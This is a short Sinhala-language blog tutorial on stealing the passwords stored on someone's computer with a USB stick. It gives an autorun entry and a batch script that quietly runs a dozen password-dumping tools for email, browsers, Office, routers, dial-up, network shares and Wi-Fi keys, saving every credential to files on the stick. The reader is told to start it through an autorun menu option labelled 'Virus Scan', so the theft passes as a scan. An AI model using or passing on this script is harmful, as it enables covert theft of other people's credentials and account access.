USB එකක් අධාරයෙන් Computer එකේ තියෙන Passwords Hack කිරීම
අද මං ඔයාටල කියලා දෙන්න යන්නේ USB එකක් යූස් කරලා PC එකක තියෙන Passwords හැක් කරගන්නේ කොහොමද කියලා.ඔයාලට මේකට අවශ්‍ය වෙන්නේ USB එකක් විතරයි.වැඩි කතා ඕනේ නෑ එහෙනම් වැඩේ පටන් ගමු.
open=launch.bat
start mailpv.exe /stext pass/mailpv.txt
start iepv.exe /stext pass/iepv.txt
start pspv.exe /stext pass/pspv.txt
start PasswordFox.exe /stext pass/passwordfox.txt
start OperaPassView.exe /stext pass/OperaPassView.txt
start ChromePass.exe /stext pass/ChromePass.txt
start WebBrowserPassView.exe /stext pass/AllBrowserPass.txt
start mspass.exe /stext pass/msofficepass.txt
start RouterPassView.exe /stext pass/Router.txt
start Dialupass.exe /stext pass/Dialupass.txt
start netpass.exe /stext pass/netpass.txt
start WirelessKeyView.exe /stext pass/WirelessKeyView.txt
මේක Launch.bat කියලා Save කරගන්න.(මේක Save කරනකොට .Bat කියලා Save කරන්න)
මේක ක්‍රියා කරන විදිහ
- දැන් ඔයා හදාගත්තු Files ටික Copy කරානේ.එහෙනම් දැන් ආයෙත් USB එක Re-Plug කරන්න.
- දැන් Autorun Menu එකක් එනවනේ එතනදී Virus Scan Option එක Click කරන්න.
- දැන් ඔයාගේ USB එකේ ඇති Passwords ටික.
(copyright on techcafe)
0 comments:
Post a Comment